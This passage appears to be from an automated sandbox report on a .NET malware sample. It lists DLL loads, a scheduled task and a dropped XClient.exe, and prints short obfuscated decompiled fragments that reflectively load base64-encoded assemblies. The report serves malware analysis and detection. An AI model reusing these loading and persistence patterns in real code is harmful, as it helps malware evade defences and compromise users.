                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Users\user\XClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\XClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\XClient.exeSection loaded: version.dll
                Source: C:\Users\user\XClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\XClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\XClient.exeSection loaded: version.dll
                Source: C:\Users\user\XClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\XClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\XClient.exeSection loaded: version.dll
                Source: C:\Users\user\XClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\XClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\XClient.exeSection loaded: version.dll
                Source: C:\Users\user\XClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\XClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\XClient.exeSection loaded: version.dll
                Source: C:\Users\user\XClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\XClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\XClient.exeSection loaded: version.dll
                Source: C:\Users\user\XClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\XClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\XClient.exeSection loaded: version.dll
                Source: C:\Users\user\XClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\XClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: XClient.lnk.1.drLNK file: ..\..\..\..\..\..\..\XClient.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\US\source\repos\Mevlana\obj\Debug\Mevlana.pdb source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020842068.0000000004CA0000.00000004.08000000.00040000.00000000.sdmp, 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\US\source\repos\Mevlana\obj\Debug\Mevlana.pdbBSJB source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020842068.0000000004CA0000.00000004.08000000.00040000.00000000.sdmp, 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: XClient.exe, 0000000F.00000000.2242259727.0000000000242000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.1.dr
                Source: Binary string: RegSvcs.pdb source: XClient.exe, 0000000F.00000000.2242259727.0000000000242000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.1.dr

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeUnpacked PE file: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.4c0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeUnpacked PE file: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.4c0000.0.unpack
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, ZNCRKfdz0LuicdFm6AEfaoD0tATclNvsedfpXpQ6erDAzlgg9KmDsGNR6wFdaevSX9Ew.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_7zBpO9WW9WtKCfDnptOEwrq3cBDGZcCp6EZ8xCXQWzWzCrNL63UThVx8aUOwKTiT7IqJK7MJL97Lia4jvUx.H0URcdYrxHdrMau2Dt9Ak1Hbzz0TEZZ1nOMTG1stxMg0Ijyw3zk6ks2BEdQb9gpaWpJg9PJNbYTLJBjXRMp,_7zBpO9WW9WtKCfDnptOEwrq3cBDGZcCp6EZ8xCXQWzWzCrNL63UThVx8aUOwKTiT7IqJK7MJL97Lia4jvUx.z61axlKSWsjUW7YgfNSITkGBn3toMjsnQ6ZkAwmLufz7Xqo0EEKixl00YZHJIqzGX2Acaw115xy84sE5XVK,_7zBpO9WW9WtKCfDnptOEwrq3cBDGZcCp6EZ8xCXQWzWzCrNL63UThVx8aUOwKTiT7IqJK7MJL97Lia4jvUx.nN3I7htr65RlCAkbqFu2UzkKaa23ZTARMRJycWht2WAOnPJgdTOTFWwL6g5suMhIxaQ3TDQXVmkSYN9cA9f,_7zBpO9WW9WtKCfDnptOEwrq3cBDGZcCp6EZ8xCXQWzWzCrNL63UThVx8aUOwKTiT7IqJK7MJL97Lia4jvUx.HNOxsq0oL5WPrs2l5bftxA4imStfOgd5FMoDkGgVLpGBun2sy0pTlJSp5t1VZWh5IuMTYJbG2xHOCVJr1Db,R1oFIDa6Sxp.SxHMXfPvFNL()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, ZNCRKfdz0LuicdFm6AEfaoD0tATclNvsedfpXpQ6erDAzlgg9KmDsGNR6wFdaevSX9Ew.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{LZCPJImEapqrVt9rPckbCpMShJPIaDHwQOiZlH2hSHYzH0ayuqbKMxl8kbDsGa7GyYO1[2],R1oFIDa6Sxp._9A1ds52CWl1(Convert.FromBase64String(LZCPJImEapqrVt9rPckbCpMShJPIaDHwQOiZlH2hSHYzH0ayuqbKMxl8kbDsGa7GyYO1[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, ZNCRKfdz0LuicdFm6AEfaoD0tATclNvsedfpXpQ6erDAzlgg9KmDsGNR6wFdaevSX9Ew.cs.Net Code: iNJxCmfyBzXXpSEUbwSbgn41FRjRtVYAU45ez4okX1BhvtHHxAUaOLNbUT54vUZmOLoy System.AppDomain.Load(byte[])
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, ZNCRKfdz0LuicdFm6AEfaoD0tATclNvsedfpXpQ6erDAzlgg9KmDsGNR6wFdaevSX9Ew.cs.Net Code: A9eDPAizhvmNZO50GQCxNWYrFy4P4nlmYyCWWLZK0BUMqWfeoz1xMJLABrgGnMp5ZLPf System.AppDomain.Load(byte[])
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, ZNCRKfdz0LuicdFm6AEfaoD0tATclNvsedfpXpQ6erDAzlgg9KmDsGNR6wFdaevSX9Ew.cs.Net Code: A9eDPAizhvmNZO50GQCxNWYrFy4P4nlmYyCWWLZK0BUMqWfeoz1xMJLABrgGnMp5ZLPf
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.4ca0000.7.raw.unpack, VectorManager.cs.Net Code: CheckFunction System.Reflection.Assembly.Load(byte[])
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2876fb0.2.raw.unpack, VectorManager.cs.Net Code: CheckFunction System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_004C2631 pushfd ; iretd 0_2_004C2632
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_00E372A1 push 69FFFFFFh; iretd 0_2_00E372A6
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C16CE2 push ebp; ret 0_2_04C16CE8
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C102C2 push ds; retf 0_2_04C102C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AB890 push eax; ret 1_2_029AB90A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AB8C0 push eax; ret 1_2_029AB8FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AB910 push eax; ret 1_2_029AB91A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AB920 push eax; ret 1_2_029AB92A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_062711DD push es; ret 1_2_062711E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06271BD1 push es; ret 1_2_06272A84
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D02198 push FFFFFFE9h; iretd 3_2_00D021A1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D0633D push eax; ret 3_2_00D06351
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D00CD0 push eax; ret 3_2_00D00CDA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D00CF0 push eax; ret 3_2_00D00CFA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D00CE0 push eax; ret 3_2_00D00CEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D00C90 push eax; ret 3_2_00D00CCA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B40FA0 push eax; ret 6_2_04B40FAA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B40F90 push eax; ret 6_2_04B40F9A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B40F80 push eax; ret 6_2_04B40F8A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B40F62 push eax; ret 6_2_04B40F7A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A64200 push ebx; ret 10_2_04A642DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A64277 push ebx; ret 10_2_04A642DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A66338 push eax; ret 10_2_04A66341
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A60FA0 push eax; ret 10_2_04A60FAA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A60FB0 push eax; ret 10_2_04A60FBA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A60FC0 push eax; ret 10_2_04A60FCA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A60F30 push eax; ret 10_2_04A60F3A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A60F60 push eax; ret 10_2_04A60F9A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A63ACD push ebx; retf 10_2_04A63ADA
